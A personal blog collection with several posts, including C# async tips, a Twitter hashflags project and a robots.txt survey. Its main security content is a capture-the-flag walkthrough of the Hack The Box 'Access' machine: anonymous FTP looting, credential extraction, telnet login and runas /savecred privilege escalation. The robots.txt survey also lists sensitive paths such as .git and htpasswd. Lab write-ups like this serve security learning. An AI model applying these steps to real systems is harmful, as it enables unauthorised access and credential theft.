7 tips for converting C# code to async/await

Over the past year I’ve moved from working mainly in Java to working mainly in C#. To be honest, Java and C# have more in common than not, but one of the major differences is async/await. It’s a really powerful tool if used correctly, but also a very quick way to shoot yourself in the foot.

Asynchronous programming looks very similar to synchronous programming. However, there are some core concepts which need to be understood in order to form a proper mental model when converting between synchronous and asynchronous programming patterns.

Here are some of the most common ones I’ve come across.


Naming

Method names should use the Async suffix when they return a Task or Task<T>. Consistency is key: the suffix signals to the caller that the method should be awaited, and it keeps naming predictable across the codebase.

Return types

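Every async method should return a Task or Task<T>. Use Task when the method produces no result; it is the asynchronous counterpart of void. Use Task<T> when a return value is required. The language does allow async void, but it is best reserved for event handlers because the caller cannot await it.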


Parameters

Async methods cannot declare ref or out parameters; the compiler rejects them. (That’s a topic for another time.) When multiple values need to be returned, use either a custom object or a Tuple.


Delegates

Following up on the lack of the void return type, no async method should be passed as an Action variant, because an async lambda assigned to an Action becomes async void and the caller cannot await it. When accepting a delegate to an asynchronous method, propagate the asynchronous pattern by accepting Func<Task> or Func<Task<T>>.

Virtual methods

In asynchronous programming there is no concept of a void return type, as the basis of the model is that each method returns a mechanism for signalling completion of the asynchronous work. When converting base classes which have empty implementations or return constant values, the framework provides helpers such as Task.CompletedTask and Task.FromResult to facilitate the pattern.


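Interfaces

Like delegates, interface methods should always return Task or Task<T>, which ensures an async-aware model throughout the stack. The async modifier itself cannot appear on a member without a body, so the return type is what makes the contract asynchronous.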


Mocks

In certain cases, mostly unit test mocks, you may find the need to implement interfaces without having any reason to actually perform any asynchronous calls. In these specific cases it is OK to feign asynchronous execution using Task.CompletedTask or Task.FromResult<T>(T result).


Summary

Overall, asynchronous programming can make applications more scalable and responsive, because threads are not blocked while waiting on I/O, but it requires a slightly different mental model. I hope these tips help!

Automated Dependency Updates

At CopenhagenJS in August I was able to share my work on Renovate—a universal dependency update tool—and how you can use it to save time and improve security in software projects.

If you want to find out more about Renovate you can find us on GitHub.

Access: Hack The Box writeup

Access info page

Recently I discovered Hack The Box, an online platform to hone your cyber security skills by practising on vulnerable VMs. The first box I solved is called Access. In this blog post I’ll walk through how I solved it. If you don’t want any spoilers, look away now!

Information gathering

Let’s start with an nmap scan to see what services are running on the box.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet  syn-ack Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp

nmap has found three services running: FTP, telnet, and an HTTP server. Let’s see what’s running on the HTTP server.

It’s just a static page, showing an image. Nothing interesting, so let’s move on for now.

Anonymous FTP

nmap showed that there is an FTP server running, with anonymous login allowed. Let’s see what’s on that server.

# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> ls Backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> ls Engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.

There are some interesting files here. Let’s download them and analyse them.

# wget ftp://anonymous:[email protected] --no-passive-ftp --mirror
--2019-02-02 15:37:26--  ftp://anonymous:*password*@
           => ‘’
Connecting to connected.
Logging in as anonymous ... Logged in!
FINISHED --2019-02-02 15:37:28--
Total wall clock time: 1.8s
Downloaded: 5 files, 5.4M in 1.4s (3.99 MB/s)

Microsoft Access

We’ve got a .mdb file (a Microsoft Access database file) and a zip file. If we take a quick look at the zip file, we can see it’s password protected. We’ll have to come back to that later.

We can examine backup.mdb using MDB tools. Maybe there’s something we can use there.

# mdb-tables Backups/backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx

It looks like there are a lot of autogenerated tables here, but those auth_* tables look interesting.

# mdb-export Backups/backup.mdb auth_user
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","[email protected]",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Awesome! So we’ve got some credentials for engineer, and we’ve got a password protected zip file in the Engineer directory.

Microsoft Outlook

# 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz (906E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
Path = Access Control.zip
Type = zip
Physical Size = 10870

Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870

# ls
'Access Control.pst'  'Access Control.zip'

That worked! Now we’ve got the mailbox backup for the engineer, but we first need to convert it to something that we can read more easily on Linux.

# readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

Let’s take a peek at the engineer’s mailbox

# mail -f Access\ Control.mbox
mail version v14.9.11.  Type `?' for help
'/root/ Control.mbox': 1 message
▸O  1 [email protected]  2018-08-23 23:44   87/3112  MegaCorp Access Control System "security" account
[-- Message  1 -- 87 lines, 3112 bytes --]:
From "[email protected]" Thu Aug 23 23:44:07 2018
From: [email protected] <[email protected]>
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000

[-- #1.1 73/2670 multipart/alternative --]

[-- #1.1.1 15/211 text/plain, 7bit, utf-8 --]

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is pass
ed on to your engineers.



[-- #1.1.2 51/2211 text/html, 7bit, us-ascii --]

Another set of credentials! I wonder what these are used for? Let’s try FTP first

# ftp
Connected to
220 Microsoft FTP Service
Name ( security
331 Password required for security.
530 User cannot log in.
ftp: Login failed.

No dice ☹. The only other option is telnet.


# telnet
Connected to
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security

Microsoft Telnet Server.

We’re in! The user.txt should be located on security's Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/02/2019  03:56 PM    <DIR>          .
02/02/2019  03:56 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
08/24/2018  07:39 PM    <DIR>          Videos
               1 File(s)        964,179 bytes
              14 Dir(s)  16,745,127,936 bytes free

C:\Users\security>cd Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  06:51 AM    <DIR>          .
08/28/2018  06:51 AM    <DIR>          ..
08/21/2018  10:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,744,726,528 bytes free

C:\Users\security\Desktop>more user.txt

Privilege escalation

Now that we’ve got the first flag, we need to escalate to root access—or more specifically Administrator on Windows.

The .yawcam directory looks out of the ordinary.

dir .yawcam
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\.yawcam

08/24/2018  07:37 PM    <DIR>          .
08/24/2018  07:37 PM    <DIR>          ..
08/23/2018  10:52 PM    <DIR>          2
08/22/2018  06:49 AM                 0 banlist.dat
08/23/2018  10:52 PM    <DIR>          extravars
08/22/2018  06:49 AM    <DIR>          img
08/23/2018  10:52 PM    <DIR>          logs
08/22/2018  06:49 AM    <DIR>          motion
08/22/2018  06:49 AM                 0 pass.dat
08/23/2018  10:52 PM    <DIR>          stream
08/23/2018  10:52 PM    <DIR>          tmp
08/23/2018  10:34 PM                82 ver.dat
08/23/2018  10:52 PM    <DIR>          www
08/24/2018  07:37 PM             1,411 yawcam_settings.xml
               4 File(s)          1,493 bytes
              10 Dir(s)  16,764,841,984 bytes free

However, poking around in there proved fruitless. Maybe there’s a way to use this, but I couldn’t figure anything out.

Let’s keep looking

C:\Users\security>cd ../

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users

02/02/2019  04:15 PM    <DIR>          .
02/02/2019  04:15 PM    <DIR>          ..
08/23/2018  11:46 PM    <DIR>          Administrator
02/02/2019  04:15 PM    <DIR>          engineer
02/02/2019  04:14 PM    <DIR>          Public
02/02/2019  04:16 PM    <DIR>          security
               0 File(s)              0 bytes
               6 Dir(s)  16,754,778,112 bytes free

Maybe one of the other users has something interesting we can use?

C:\Users>cd engineer
Access is denied.

I didn’t really expect that to work anyway

C:\Users>cd Public

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               1 File(s)        964,179 bytes
               7 Dir(s)  16,723,468,288 bytes free

Wait a minute, we’re missing some of the standard Windows directories. Let’s have a closer look.

C:\Users\Public>dir /A
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
08/28/2018  06:51 AM    <DIR>          Desktop
07/14/2009  04:57 AM               174 desktop.ini
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  02:34 AM    <DIR>          Favorites
07/14/2009  04:57 AM    <DIR>          Libraries
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               2 File(s)        964,353 bytes
              10 Dir(s)  16,717,438,976 bytes free

Desktop has a much more recent modification date than everything else

C:\Users\Public>cd Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public\Desktop

08/22/2018  09:18 PM             1,870 ZKAccess3.5 Security System.lnk
               1 File(s)          1,870 bytes
               0 Dir(s)  16,711,475,200 bytes free

That’s because there’s a shortcut there.

Now, I’m not sure of the best way to view a .lnk on cmd.exe via telnet, but this is what I came up with. If anyone knows of a better way, please let me know!

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
                                                                                                        runas.exe��:1��:1*Yrunas.exeL-K��EC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
                                                                                         )ΰ[	��1SPSXFL8C���&me*S-1-5-21-953262931-566350628-63446256-500

It’s a bit difficult to read, but it looks like the shortcut runs a program as the Administrator using saved credentials. We can use that.
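If the shortcut can be copied off the box, a strings-style pass gives a cleaner view than the raw type output. The sketch below is only an illustration and was not part of the original walkthrough: printable_strings is a hypothetical helper that pulls printable ASCII and UTF-16LE runs out of any binary blob, which is roughly how the runas arguments above can be picked out of the .lnk.

```python
import re

def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII and UTF-16LE strings found in binary data."""
    # Runs of at least min_len printable single-byte characters.
    ascii_runs = re.findall(rb'[\x20-\x7e]{%d,}' % min_len, data)
    # The same characters stored as UTF-16LE: each one followed by a zero byte.
    utf16_runs = re.findall(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len, data)
    found = [run.decode('ascii') for run in ascii_runs]
    found += [run.decode('utf-16-le') for run in utf16_runs]
    return found

if __name__ == '__main__':
    # Hypothetical local copy of the shortcut.
    with open('ZKAccess3.5 Security System.lnk', 'rb') as f:
        for s in printable_strings(f.read()):
            print(s)
```

ASCII strings are listed first and UTF-16LE strings second, so the output order does not follow the order in the file.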

C:\Users\Public\Desktop>runas /user:Administrator /savecred "cmd.exe /c more C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\Desktop\output.txt"

Did it work?

C:\Users\Public\Desktop>more output.txt

Yes! From there we could generate a reverse shell using msfvenom and run that as Administrator, but I’ve got the flag so I’ll leave it there for now.

Twitter Hashflags (Hash-what?)

Have you ever tweeted out a hashtag, and discovered a small image attached to the side of it? It could be for #StPatricksDay, #MarchForOurLives, or whatever #白白白白白白白白白白 is meant to be. These are hashflags.

A hashflag, sometimes called Twitter emoji, is a small image that appears after a #hashtag for special events. They are not regular emoji, and you can only use them on the Twitter website, or the official Twitter apps. For example:

If you’re a company, and you have enough money, you can buy your own hashflag as well! That’s exactly what Disney did for the release of Star Wars: The Last Jedi.

If you spend the money to buy a hashflag, it’s important that you launch it correctly, otherwise it can flop. #白白白白白白白白白白 is an example of what not to do. At time of writing, it has only 10 uses.

Hashflags aren’t exclusive to English, and they can help add context to a tweet in another language. I don’t speak any Russian, but I do know that this image is of BB-8!

Unfortunately hashflags are temporary, so any context they add to a tweet can sometimes be lost at a later date. Currently Twitter doesn’t provide an official API for hashflags, and there is no canonical list of currently active hashflags. @hashflaglist tracks hashflags, but it’s easy to miss one—this is where Azure Functions come in.

It turns out that on Twitter.com the list of currently active hashflags is sent as a JSON object in the HTML as initial data. All I need to do is fetch Twitter.com, and extract the JSON object from the HTML.

$ curl https://twitter.com -v --silent 2>&1 | grep -o -P '.{6}activeHashflags.{6}'


I wrote some C# to parse and extract the activeHashflags JSON object, and store it in an Azure blob. You can find it here. Using Azure Functions I can run this code on a timer, so the Azure blob is always up to date with the latest Twitter hashflags. This means the blob can be used as an unofficial Twitter hashflags API—but I didn’t want to stop there.
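The extraction step can be sketched in a few lines of Python. This is not the C# mentioned above, just an illustration of the idea: extract_json_value is a hypothetical helper, and it assumes the page embeds the data as a plain "activeHashflags": {...} JSON pair somewhere in the HTML, which may not match what Twitter.com actually serves.

```python
import json

def extract_json_value(html: str, key: str):
    """Decode the JSON value that follows "key": inside a larger document."""
    marker = f'"{key}":'
    start = html.find(marker)
    if start == -1:
        raise ValueError(f'{key!r} not found')
    idx = start + len(marker)
    # raw_decode does not skip leading whitespace, so do that by hand.
    while idx < len(html) and html[idx].isspace():
        idx += 1
    # raw_decode parses exactly one JSON value and ignores whatever follows it.
    value, _ = json.JSONDecoder().raw_decode(html, idx)
    return value

if __name__ == '__main__':
    # Invented sample page; the real markup is an assumption.
    page = '<script>{"activeHashflags": {"StarWars": "https://example.com/bb8.png"}}</script>'
    print(extract_json_value(page, 'activeHashflags'))
```

Letting the JSON decoder find the end of the object avoids hand-counting braces, which breaks as soon as a string value contains one.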

I wanted to solve some of the issues with hashflags around both discovery and durability. Azure Functions is the perfect platform for these small, single purpose pieces of code. I ended up writing five Azure Functions in total—all of which can be found on GitHub.

Screenshot of hashflags-function GitHub page

  1. ActiveHashflags fetches the active hashflags from Twitter, and stores them in a JSON object in an Azure Storage Blob. You can find the list of current hashflags here.
  2. UpdateHashflagState reads the JSON, and updates the hashflag table with the current state of each hashflag.
  3. StoreHashflagImage downloads the hashflag image, and stores it in a blob store.
  4. CreateHeroImage creates a hero image of the hashtag and hashflag.
  5. TweetHashflag tweets the hashtag and hero image.

Say hello to @HashflagArchive!

Screenshot of HashflagArchive Twitter stream

@HashflagArchive solves both the issues I have with hashflags: it tweets out new hashflags the same hour they are activated on Twitter, which solves the issue of discovery; and it tweets an image of the hashtag and hashflag, which solves the issue of hashflags being temporary.

So this is great, but there’s still one issue—how to use hashflags outside of Twitter.com and the official Twitter apps. This is where the JSON blob comes in. I can build a wrapper library around that, and then using that library, build applications with Twitter hashflags. So that’s exactly what I did.

Screenshot of hashflags-node GitHub page

I wrote an npm package called hashflags. It’s pretty simple to use, and integrates nicely with the official twitter-text npm package.

import { Hashflags } from 'hashflags';

let hf: Hashflags;
Hashflags.FETCH().then((val: Map<string, string>) => {
  // Build the helper from the fetched hashflag map
  hf = new Hashflags(val);
});

I wrote it in TypeScript, but it can also be used from plain old JS.

const Hashflags = require('hashflags').Hashflags;

let hf;
Hashflags.FETCH().then(val => {
  // Build the helper from the fetched hashflag map
  hf = new Hashflags(val);
});

So there you have it, a quick introduction to Twitter hashflags via Azure Functions and an npm library. If you’ve got any questions please leave a comment below, or reach out to me on Twitter @Jamie_Magee.

A survey of robots.txt - part two

In part one of this article, I collected robots.txt from the top 1 million sites on the web. In this article I’m going to do some analysis, and see if there’s anything interesting to find from all the files I’ve collected.

First we’ll start with some setup.

%matplotlib inline

import pandas as pd
import numpy as np
import glob
import os
import matplotlib

Next I’m going to load the content of each file into my pandas dataframe, calculate the file size, and store that for later.

# Each file in robots-txt/ is named after the domain it was collected from
l = [os.path.basename(filename) for filename in glob.glob('robots-txt/*')]
df = pd.DataFrame(l, columns=['domain'])
df['content'] = df.apply(lambda x: open('robots-txt/' + x['domain']).read(), axis=1)
df['size'] = df.apply(lambda x: os.path.getsize('robots-txt/' + x['domain']), axis=1)

        domain                   content                                            size
612419  veapple.com              User-agent: *\nAllow: /\n\nSitemap: http://www...  260
622296  buscadortransportes.com  User-agent: *\nDisallow: /out/                     29
147795  dailynews360.com         User-agent: *\nAllow: /\n\nDisallow: /search/\...  248
72823   newfoundlandpower.com    User-agent: *\nDisallow: /Search.aspx\nDisallo...  528
601408  xfwed.com                #\n# robots.txt for www.xfwed.com\n# Version 3...  201

File sizes

Now that we’ve done the setup, let’s see what the spread of file sizes in robots.txt is.

fig = df.plot.hist(title='robots.txt file size', bins=20)


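It looks like the majority of robots.txt are under 250KB in size. This is really no surprise, as robots.txt rules can use wildcards (* and $ are honoured by the major crawlers, although full regular expressions are not), so complex rulesets can be expressed in very few lines.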
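To show how far a single rule can reach, here is a minimal sketch of robots.txt path matching. It assumes the common wildcard extension, where * matches any run of characters and a trailing $ anchors the end of the path; robots_pattern_to_regex and path_matches are hypothetical helpers written for this illustration, not part of the analysis in this post.

```python
import re

def robots_pattern_to_regex(pattern: str) -> "re.Pattern":
    """Translate a robots.txt path pattern into a compiled regex.

    Assumes '*' matches any run of characters and a trailing '$'
    anchors the end of the URL path.
    """
    anchored = pattern.endswith('$')
    if anchored:
        pattern = pattern[:-1]
    # Escape each literal piece, then join the pieces with '.*' for every '*'.
    body = '.*'.join(re.escape(part) for part in pattern.split('*'))
    return re.compile(body + ('$' if anchored else ''))

def path_matches(pattern: str, path: str) -> bool:
    # Rules apply from the start of the path, so use match() rather than search().
    return robots_pattern_to_regex(pattern).match(path) is not None

if __name__ == '__main__':
    print(path_matches('/*route=account/', '/index.php?route=account/login'))
    print(path_matches('/*.pdf$', '/docs/a.pdf?x=1'))
```

One line such as Disallow: /*route=account/ covers every URL containing that query fragment, which is why most files stay small.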

Let’s take a look at the files larger than 1MB. I can think of three possibilities: they’re automatically maintained; they’re some other file masquerading as robots.txt; or the site is doing something seriously wrong.

import re

large = df[df['size'] > 10 ** 6].sort_values(by='size', ascending=False)

def count_directives(value, domain):
    # Case-insensitive substring count, so 'Allow' also matches inside 'Disallow'
    content = domain['content']
    return len(re.findall(value, content, re.IGNORECASE))

large['disallow'] = large.apply(lambda x: count_directives('Disallow', x), axis=1)
large['user-agent'] = large.apply(lambda x: count_directives('User-agent', x), axis=1)
large['comments'] = large.apply(lambda x: count_directives('#', x), axis=1)

# The directives below are non-standard

large['crawl-delay'] = large.apply(lambda x: count_directives('Crawl-delay', x), axis=1)
large['allow'] = large.apply(lambda x: count_directives('Allow', x), axis=1)
large['sitemap'] = large.apply(lambda x: count_directives('Sitemap', x), axis=1)
large['host'] = large.apply(lambda x: count_directives('Host', x), axis=1)

632170  haberborsa.com.tr       User-agent: *\nAllow: /\n\nDisallow: /?ref=\nD...  5820350  7124420071245510
23216   miradavetiye.com        Sitemap: https://www.miradavetiye.com/sitemap_...  5028384  470267004702620
282904  americanrvcompany.com   Sitemap: http://www.americanrvcompany.com/site...  4904266  568461105685220
446326  exibart.com             User-Agent: *\nAllow: /\nDisallow: /notizia.as...  3275088  614031006140400
55309   vibralia.com            # robots.txt automaticaly generated by PrestaS...  2835552  3971211503973600
124850  oftalmolog30.ru         User-Agent: *\nHost: chuzmsch.ru\nSitemap: htt...  2831975  877521008775222
677400  bigclozet.com           User-agent: *\nDisallow: /item/\n\nUser-agent:...  2708717  512214005122100
621834  tranzilla.ru            Host: tranzilla.ru\nSitemap: http://tranzilla....  2133091  276471002764821
428735  autobaraholka.com       User-Agent: *\nDisallow: /registration/\nDisal...  1756983  393301003933002
628591  megasmokers.ru          User-agent: *\nDisallow: /*route=account/\nDis...  1633963  922009221
647336  valencia-cityguide.com  # If the Joomla site is installed within a fol...  1559086  17719112017719199
663372  vetality.fr             # robots.txt automaticaly generated by PrestaS...  1536758  2773711202773700
105735  golden-bee.ru           User-agent: Yandex\nDisallow: /*_openstat\nDis...  1139308  240814102408101
454311  dreamitalive.com        user-agent: google\ndisallow: /memberprofileda...  1116416  343923003440109
245895  gobankingrates.com      User-agent: *\nDisallow: /wp-admin/\nAllow: /w...  1018109  736228202736300

It looks like all of these sites are misusing Disallow and Allow. In fact, looking at the raw files it appears as if they list all of the articles on the site under an individual Disallow command. I can only guess that when publishing an article, a corresponding line in robots.txt is added.
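One caveat when reading these counts: a case-insensitive substring search for Allow also matches inside every Disallow, and a search for Disallow also counts commented-out lines. A stricter count reads the field name at the start of each line. The following is a minimal sketch of that approach; count_directive_lines is a hypothetical helper and was not used to produce the numbers above.

```python
import re
from collections import Counter

# A directive is a field name at the start of a line, followed by a colon.
DIRECTIVE_RE = re.compile(r'^[ \t]*([A-Za-z-]+)[ \t]*:', re.MULTILINE)

def count_directive_lines(content: str) -> Counter:
    """Count directives by field name, ignoring comments and URL contents."""
    return Counter(name.lower() for name in DIRECTIVE_RE.findall(content))

if __name__ == '__main__':
    sample = (
        'User-agent: *\n'
        'Allow: /\n'
        '\n'
        'Disallow: /?ref=\n'
        'Disallow: /search/\n'
        '# Disallow: /old/\n'
        'Sitemap: https://example.com/sitemap.xml\n'
    )
    print(count_directive_lines(sample))
    # The substring approach, for comparison.
    print(len(re.findall('Allow', sample, re.IGNORECASE)))
```

On a file that lists thousands of Disallow lines, the two approaches give very different Allow counts, so the stricter version is worth using before drawing conclusions about Allow.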

Now let’s take a look at the smallest robots.txt

small = df[df['size'] > 0].sort_values(by='size', ascending=True)


There’s not really anything interesting here, so let’s take a look at some larger files

small = df[df['size'] > 10].sort_values(by='size', ascending=True)

        domain        content      size
329775  klue.kr       Disallow: /  11
390064  chneic.sh.cn  Disallow: /  11
355604  hpi-mdf.com   Disallow: /  11

Disallow: / tells all webcrawlers not to crawl anything on this site, and should (hopefully) keep it out of any search engines, but not all webcrawlers follow robots.txt.
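Python’s standard library can evaluate rules like this, which is a handy way to check what a well-behaved crawler would do. The sketch below uses urllib.robotparser; can_crawl is a hypothetical wrapper, the bot name and URLs are invented, and the sample rules are grouped under a User-agent line, which the files above lack.

```python
from urllib.robotparser import RobotFileParser

def can_crawl(robots_txt: str, user_agent: str, url: str) -> bool:
    """Return True if the given rules allow user_agent to fetch url."""
    parser = RobotFileParser()
    # parse() takes an iterable of lines rather than one string.
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)

if __name__ == '__main__':
    block_all = 'User-agent: *\nDisallow: /'
    print(can_crawl(block_all, 'ExampleBot', 'https://example.com/page'))
```

This only tells you what a compliant crawler would do; nothing in the protocol stops a crawler from ignoring the file.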

User agents

User agents can be listed in robots.txt to either Allow or Disallow certain paths. Let’s take a look at the most common webcrawlers.

from collections import Counter

def find_user_agents(content):
    return re.findall('User-agent:? (.*)', content)

user_agent_list = [find_user_agents(x) for x in df['content']]
user_agent_count = Counter(x.strip() for xs in user_agent_list for x in set(xs))
[('*', 587729),
('Mediapartners-Google', 36654),
('Yandex', 29065),
('Googlebot', 25932),
('MJ12bot', 22250),
('Googlebot-Image', 16680),
('Baiduspider', 13646),
('ia_archiver', 13592),
('Nutch', 11204),
('AhrefsBot', 11108)]

It’s no surprise that the top result is a wildcard (*). Google takes spots 2, 4, and 6 with their AdSense, search and image web crawlers respectively. It does seem a little strange to see the AdSense bot listed above the usual search web crawler. Some of the other large search engines’ bots are also found in the top 10: Yandex and Baidu. MJ12bot is a crawler I had not heard of before, but according to their site it belongs to a UK based SEO company, and according to some of the results about it, it doesn’t behave very well. ia_archiver belongs to The Internet Archive, and (I assume) crawls pages for the Wayback Machine. Finally there is Apache Nutch, an open source webcrawler that can be run by anyone.
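Field names in robots.txt are not consistently cased in the wild (the large files above include both User-Agent and user-agent), so a case-sensitive pattern undercounts. Here is a hedged sketch of a case-insensitive, line-anchored variant; count_user_agents is a hypothetical helper, and its totals would differ from the figures quoted above.

```python
import re
from collections import Counter

USER_AGENT_RE = re.compile(
    r'^[ \t]*user-agent[ \t]*:[ \t]*(.*?)[ \t]*$',
    re.IGNORECASE | re.MULTILINE,
)

def count_user_agents(contents) -> Counter:
    """Count how many files mention each user agent, once per file."""
    counts = Counter()
    for content in contents:
        # A set keeps one entry per agent per file; strip() drops stray '\r'.
        agents = {match.strip() for match in USER_AGENT_RE.findall(content)}
        counts.update(agent for agent in agents if agent)
    return counts

if __name__ == '__main__':
    files = [
        'User-agent: *\nDisallow: /\nUser-agent: *\nAllow: /x',
        'User-Agent: Googlebot\r\nDisallow: /a\r\nuser-agent: *\r\nDisallow: /b',
    ]
    print(count_user_agents(files).most_common(10))
```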

Security by obscurity

There are certain paths that you might not want a webcrawler to know about. For example, a .git directory, htpasswd files, or parts of a site that are still in testing, and aren’t meant to be found by anyone on Google. Let’s see if there’s anything interesting.

# Raw strings keep the backslashes intact for the regex engine
sec_obs = [r'\.git', 'alpha', 'beta', 'secret', 'htpasswd', r'install\.php', r'setup\.php']
sec_obs_regex = re.compile('|'.join(sec_obs))

def find_security_by_obscurity(content):
    return sec_obs_regex.findall(content)

sec_obs_list = [find_security_by_obscurity(x) for x in df['content']]
sec_obs_count = Counter(x.strip() for xs in sec_obs_list for x in set(xs))
[('install.php', 28925),
('beta', 2834),
('secret', 753),
('alpha', 597),
('.git', 436),
('setup.php', 73),
('htpasswd', 45)]

Just because a file or directory is mentioned in robots.txt, it doesn’t mean that it can actually be accessed. However, if even 1% of WordPress installs leave their install.php open to the world, that’s still a lot of vulnerable sites. Any attacker could get the keys to the kingdom very easily. The same goes for a .git directory. Even if it is read-only, people accidentally commit secrets to their git repository all the time.
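These counts come from plain substring matches, so a path such as /secretary/ or /alphabet/ is counted too. If that matters, the terms can be required to stand alone. The following is a minimal sketch under that assumption; find_sensitive_terms is a hypothetical helper, and its counts would be lower than the ones above.

```python
import re

SENSITIVE_TERMS = ['.git', 'alpha', 'beta', 'secret', 'htpasswd', 'install.php', 'setup.php']

# Match a term only when it is not glued to letters or digits on either side.
SENSITIVE_RE = re.compile(
    r'(?<![A-Za-z0-9])('
    + '|'.join(re.escape(term) for term in SENSITIVE_TERMS)
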